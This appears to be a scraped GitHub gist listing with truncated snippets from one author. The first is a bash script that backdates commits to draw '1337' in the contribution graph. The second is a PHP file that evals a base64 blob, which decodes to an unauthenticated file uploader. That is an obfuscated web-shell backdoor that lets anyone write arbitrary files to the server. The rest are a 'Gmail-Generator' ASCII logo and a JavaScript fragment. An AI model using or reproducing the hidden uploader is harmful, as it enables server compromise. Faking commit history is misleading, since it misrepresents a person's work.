This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Display "1337" in GitHub Contributions Summary! | |
# Author: Jockerdz Salah <https://GitHub.com/salahhadjar> | |
date -s "20200407" && date > README.md && git add README.md && git commit -am "Hello, world!" | |
date -s "20200411" && date > README.md && git add README.md && git commit -am "Hello, world!" | |
date -s "20200413" && date > README.md && git add README.md && git commit -am "Hello, world!" | |
date -s "20200418" && date > README.md && git add README.md && git commit -am "Hello, world!" | |
date -s "20200419" && date > README.md && git add README.md && git commit -am "Hello, world!" | |
date -s "20200420" && date > README.md && git add README.md && git commit -am "Hello, world!" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<title>Sàlà7.Dz.JoCker</title> | |
<?php | |
eval (base64_decode("ZWNobyAnPGI+Sm9Da2VyRHogU2FsYWg8YnI+PGJyPicgLiBwaHBfdW5hbWUoKSAuICc8YnI+PC9iPic7DQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiAoJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIpIHsNCiAgICBpZiAoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsNCiAgICAgICAgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgITwvYj48YnI+PGJyPic7DQogICAgfSBlbHNlIHsNCiAgICAgICAgZWNobyAnPGI+VXBsb2FkIEZhaWwgITwvYj48YnI+PGJyPic7DQogICAgfQ0KfQ==")); | |
?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
logo = """ | |
________ .__.__ ________ __ | |
/ _____/ _____ _____ |__| | / _____/ ____ ____ ________________ _/ |_ ___________ | |
/ \ ___ / \\__ \ | | | ______ / \ ____/ __ \ / \_/ __ \_ __ \__ \\ __\/ _ \_ __ \ | |
\ \_\ \ Y Y \/ __ \| | |__ /_____/ \ \_\ \ ___/| | \ ___/| | \// __ \| | ( <_> ) | \/ | |
\______ /__|_| (____ /__|____/ \______ /\___ >___| /\___ >__| (____ /__| \____/|__| | |
\/ \/ \/ \/ \/ \/ \/ \/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*** Aliases **/ | |
var $a = function( sel ){ | |
return document.querySelector( sel ); | |
} | |
var ModalExist = false; | |
/** |